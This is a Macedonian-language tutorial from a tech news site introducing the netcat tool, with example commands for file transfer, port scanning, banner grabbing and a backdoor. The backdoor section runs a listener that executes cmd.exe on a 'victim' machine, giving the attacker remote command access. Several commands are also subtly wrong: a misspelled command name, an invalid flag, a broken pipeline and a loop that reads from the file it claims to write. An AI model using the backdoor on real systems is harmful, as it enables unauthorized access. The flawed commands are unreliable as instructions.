NetCat – Армиско ножче

IT.mk редакција

во Совети

{mosimage}NetCat – Армиско ножче како што многумина ја нарекуваат оваа алатка, е алатка за брзи таскови при работа со мрежи и уште покорисна кога ни е потребно на брз и едноставен начин да поврземе два компјутера во облик клиент-сервер. NetCat првично е создадена како UNIX алатка во далечната 1996 од добро познатиот хакер/кракер Hobbit.

Подоцна со доста преработки и верзии за да се постигнете денешната верзија GNU Netcat 0.7.1 која под дифолт доаѓа со
скоро секоја линукс дистрибуција. Истата секако денеска може да се најде компатибилна и со останатите популарни оперативни системи.Оваа алатка беше во топ 100 безбедносни алатките на неколку анкети. Во 2000-та беше втора на анкетата на Insecure.org (не вклучувајќи ја nMap – алакта на Insecure.org)

Netcat го користи TCP/IP протоколот за воспоставување конекции од и кон компјутерот на било кој порт кој вие ќе го дефинирате. Најголема предност е нејзината едноставност. Па така со оваа алатка може да извршите милион корисни работи во стилот: префрлување на некој фајл од компјутер на друг, далечинско извршување команди на другиот компјутер (еден вид backdoor), скенирање на портови од даден опсег,
пренасочување на портови, па се до стримување и слушање музика.

Колку за пример да видиме неколку употреби:

– Префрлување на фајл – кога од разни причини останатите методи се безкорисни или пак едноставно сакате тоа да го сторите на “различен”, побрз начин:

На компјутерот А со адреса (1.1.1.0) сакате да го префрлите фајлот t00tw00t од компјутер Б со адреса (1.1.1.1.).
На компјутерот А пишуваме:
nc –L –p 1111 > t00tw00t
nc ќе се закачи на 1111 портот така да во случај вашиот фајрвол не го дозволува тоа ова нема да биде успешно.
На компјутерот Б пишиваме:
nc 1.1.1.0 1111 < t00tw00t

Или пак обратното сценарио од компјутерот А сакаме да префрлиме на компјутерот Б:
На компјутерот Б:
nc t00tw00t | nc –l –p 1111

На компјутерот А:
nc 1.1.1.0 1111 > t00tw00t

Лоша работа е тоа што нема да можете да го гледате прогресот на трансфер и кога тој би завршил.

– Друга корисна работа е скенирањето порти кое го извршуваме на следниот начин:
nv -z –w 3 1.1.1.1 10-100

Со оваа команда ќе бидат скенирани портовите од 10 до 100 на 1.1.1.1, со тајм-аут 3 секунди, -z опцијата не дава да се праќа никаква информација на TCP конекцијата и користење на доволно мали пробни пакети при UDP конекција. Со ова е овозможено побрзо скенирање. Доколку сакате да додадете пауза помеѓу пробите за конектирање на портовите користе го -i опцијата.

– Користење на NetCat како вид backdoor:
На жртвата компјутер пишуваме (хостот А):
nc -l -p 1111 -e cmd.exe
-l да се закачи и да чека конекција
-p дефинираме порт
-е програмот кој треба да се изврши при конекцијата (во овој случај cmd.exe)

Сега едноставно од компјутерот напаѓач пишуваме:
nc 1.1.1.0 1111

– Користење на Netcat за земање банери:
Ова е корисно кога на пример имате голема листа IP-а кои треба да ги индексирате и да видите каков веб сервер користат. Нормално автоматизирање на овој процес како и на сите претходно наведени е можно на повеќе начини и ова е само еден од нив. IP-ата ги имаме снимено во фајлот iplist.txt. Скенирањето го вршиме на следниов начин:
for i in `cat iplist.txt`; do nc $i 80 < results.txt; done;

Кратка bash скрипта со for loop кој ќе ги земе IP-ата едно по едно и ќе ги проследи до nc, и резултатите ќе се снимат во results.txt.

Истото важи и за земање банери и на други сервиси како на пример FTP за што само ќе треба да го смените портот од 80 во 21 нормално.

Ова нека биде само еден краток преглед, постојат многу други варијации и употреби на netcat и истите зависат од вашите потреби, љубопитност и креативност.

Завршувањето на задачите кои ги споменав може да го сторите на многу други
подобри начини, а ова е само еден осврт како тоа да го сторите тоа брзо и едноставно со користење на
netcat.

Коментирај

Вашата адреса за е-пошта нема да биде објавена.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*

Слични статии